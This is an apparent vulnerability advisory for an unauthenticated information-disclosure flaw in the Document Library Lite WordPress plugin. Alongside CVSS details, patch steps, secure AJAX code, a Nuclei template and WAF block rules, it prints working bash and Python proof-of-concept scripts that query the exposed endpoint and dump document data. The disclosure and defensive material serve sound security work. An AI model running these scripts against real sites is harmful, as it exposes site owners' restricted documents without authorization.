Keywords: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025
- Overview
- Vulnerability Details
- Technical Analysis
- Attack Vector
- Proof of Concept
- Remediation Guide
- Detection
- CVSS Metrics
- References
- Credits
- Security Contact
Document Library Lite WordPress Plugin Information Disclosure Vulnerability (CVE-2025-11174) - Security flaw allowing unauthenticated access to sensitive document data in WordPress document library plugin.
A critical authorization bypass vulnerability was discovered in the Document Library Lite WordPress Plugin that allows unauthenticated attackers to access sensitive document information without proper authentication.
Discovered by: Kai Aizen & Avraham Shemesh (SnailSploit)
Published: November 1, 2025
CVSS Score: 5.3 (Medium)
CWE: CWE-862 - Missing Authorization
Plugin: Document Library Lite
Vendor: Barn2 Plugins
Attack Type: Unauthenticated Information Disclosure
Required Privileges: None (Unauthenticated Attack)
The Document Library Lite plugin for WordPress contains an improper authorization vulnerability in all versions up to and including 1.1.6. The plugin exposes an unauthenticated AJAX action dll_load_posts which returns a JSON table of document data without performing nonce or capability checks.
This vulnerability allows unauthenticated attackers to:
- Access document metadata without authorization
- Retrieve document listings that should be restricted
- View document information intended for authenticated users only
- Enumerate documents stored in the Document Library
Note: The CVSS score of 5.3 (Medium severity) reflects limited information disclosure. While the vulnerability allows unauthenticated access to document data, the impact is rated as Low for confidentiality with no integrity or availability impact.
- Vulnerable: All versions ≤ 1.1.6
- Patched: Version 1.1.7 and above
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | Low (C:L) |
| Integrity | None (I:N) |
| Availability | None (A:N) |
CVSS v3.1 Breakdown:
- Attack Vector (AV): Network - The vulnerability can be exploited remotely over a network
- Attack Complexity (AC): Low - No special conditions are required for exploitation
- Privileges Required (PR): None - No authentication or privileges are required
- User Interaction (UI): None - The exploit works without any user interaction
- Scope (S): Unchanged - The vulnerability only affects the vulnerable component
- Confidentiality Impact (C): Low - Limited information disclosure
- Integrity Impact (I): None - No integrity impact
- Availability Impact (A): None - No availability impact
The AJAX action dll_load_posts is registered without proper authentication or authorization checks:
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');The wp_ajax_nopriv_ prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation
POST /wp-admin/admin-ajax.php
action=dll_load_posts
The vulnerability can be exploited through the WordPress admin-ajax.php endpoint without authentication.
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
echo "Usage: $0 <target_url>"
echo "Example: $0 https://example.com"
exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""
# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=dll_load_posts" \
| python3 -m json.tool
echo ""
echo "[+] If you see document data above, the site is vulnerable!"#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""
import requests
import sys
import json
def exploit(target_url):
ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
print(f"[*] Target: {target_url}")
print(f"[*] AJAX Endpoint: {ajax_url}\n")
data = {'action': 'dll_load_posts'}
try:
response = requests.post(ajax_url, data=data, timeout=10)
if response.status_code == 200:
print("[+] Request successful!\n")
try:
json_data = response.json()
print("[+] Retrieved document data:")
print(json.dumps(json_data, indent=2))
print("\n[!] Site is VULNERABLE to CVE-2025-11174")
except json.JSONDecodeError:
print("[-] No JSON response received")
print(f"Response: {response.text[:200]}")
else:
print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target_url>")
print(f"Example: {sys.argv[0]} https://example.com")
sys.exit(1)
target = sys.argv[1]
exploit(target)Immediate Action Required:
- Update to Document Library Lite version 1.1.7 or later immediately
- Review your site's access logs for suspicious POST requests to
admin-ajax.phpwithaction=dll_load_posts - If you cannot update immediately, consider temporarily disabling the plugin
Via WordPress Admin:
- Navigate to Plugins > Installed Plugins in WordPress admin
- Locate "Document Library Lite"
- Click Update Now to upgrade to version 1.1.7 or later
- Verify the update was successful
Using WP-CLI:
wp plugin update document-library-liteEnsure all AJAX handlers implement proper security controls:
// Example of proper AJAX security
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
function dll_load_posts_callback() {
// Verify nonce
if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
wp_die('Invalid nonce');
}
// Check capabilities
if (!current_user_can('read')) {
wp_send_json_error('Insufficient permissions');
wp_die();
}
// Your secure code here
}# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"Nuclei Template:
id: CVE-2025-11174
info:
name: Document Library Lite - Unauthenticated Information Disclosure
author: security-research
severity: medium
description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
reference:
- https://github.com/[your-repo]/CVE-2025-11174
tags: cve,cve2025,wordpress,wp-plugin,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
body: "action=dll_load_posts"
matchers-condition: and
matchers:
- type: word
words:
- "data"
- "recordsTotal"
condition: and
- type: status
status:
- 200ModSecurity Rule:
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
"chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
SecRule ARGS:action "@streq dll_load_posts" "t:none"Nginx/OpenResty Rule:
if ($request_uri ~* "admin-ajax\.php") {
if ($args ~* "action=dll_load_posts") {
return 403;
}
}- November 1, 2025 - Vulnerability publicly disclosed
- November 1, 2025 - CVE record published
- November 2025 - Patch released (version 1.1.7)
Researchers:
Disclosure Process: Coordinated disclosure
This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.
For questions or additional information about this vulnerability:
- Email: kai@owasp.com
- Website: snailsploit.com
- Organization: SnailSploit Security Research
Last updated: November 2, 2025